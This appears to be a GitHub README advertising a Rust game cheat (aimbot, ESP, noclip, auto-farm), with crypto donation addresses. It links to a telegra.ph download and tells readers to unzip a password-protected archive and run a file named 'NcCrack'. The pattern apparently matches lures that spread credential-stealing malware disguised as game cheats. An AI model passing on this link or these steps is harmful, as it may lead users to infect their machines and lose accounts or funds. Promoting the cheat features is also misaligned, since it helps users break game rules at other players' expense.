# RUST-HACK-ESP-AIMBOT

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server

-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Support the author ( On chips )

- BTC - bc1q7kmj3pyhcm2n02z6p7gxvusqv55pt7vcgxe6ut

- ETH - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

- TRC-20 ( Usdt ) - TRYhDuV6qVcHQjfqEgF15w72TdxCMLDt9b

- BNB - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

# Functions

# AIMBOT

- Enable Aim Bot
- Perfect Silent (10x Better Prediction)
- Recoil Comp
- Smoothing
- Prediction
- Bone Override (Always hit head)
- Weak Spot Override (For Patrol Heli)
- Recoil Control
- Full auto
- No spread
- Projectile Speed (Bullets go faster)
- Shoot In Air
- Weapon Spammer
- No Bolt Cycle
- Unlock Angles (360 degree turn in horses ect
- Aim in mountable
- No melee Slowdown
- 2x Melee distance
- No aim cone
- Fast Bow
- instant charge
- No movement penalty

# VISUALS

- Player Esp
- Chams (Glow ESP) (Rainbow)
- Team Esp
- Scientists Esp
- Skeleton
- Vis Check (Changes color when visible)
- Sleeper Esp
- Wounded Esp
- Safe Zone Esp
- Corpse
- Backpack
- Radar Esp
- EXTRA
- HOTBAR (See players inventory)
- Team and enemy key esp (Mark Team/enemy)
- Just about anything you can think of
- Animals
- Weapon Esp
- Stash
- Crates ect
- Miscs

# MISC

- Day Hack
- Sky Color
- ChangerAmbient
- Bright Stars
- No Rain
- No Fog
- No Wind
- No Water Blur
- Auto Farm Ore
- Auto Farm Tree
- Auto Melee Player/Animals
- Auto Collect
- Auto Clone
- Auto Knock (Troll misc)
- Auto Lock Code
- Auto Auth Code
- Auto Upgrade
- Auto Suicide (Respawn while on f1 kill timer)
- Auto Open
- Auto Free Crates
- Admin Mode
- FlyhackInteractive
- Noclip
- On Ladder
- Omni Sprint
- Spiderman
- Infinite Jump
- Walk on Water
- SPINBOT
- Autorun
- Viewoffsets
- Fakelag
- Instant Loot
- Instant Revive
- Nofall
- No Slowdown
- No Collision
- No Aimblock
- Save Config
- Load Config


![e1II2SZ](https://user-images.githubusercontent.com/119938147/213412471-bf55be0c-c78e-48f2-8480-c897ad7decbf.jpeg)
![RsuGqd1](https://user-images.githubusercontent.com/119938147/213412475-91a13207-eb7c-40a4-a27b-d4543a4a7a60.jpeg)
![u4UeCkS](https://user-images.githubusercontent.com/119938147/213412479-52b8e364-5ab6-4bde-ae97-43e4592e4ab3.jpeg)
![wI8m3ze](https://user-images.githubusercontent.com/119938147/213412482-e333912c-305f-4aae-b151-c60a5ca71a9d.jpeg)
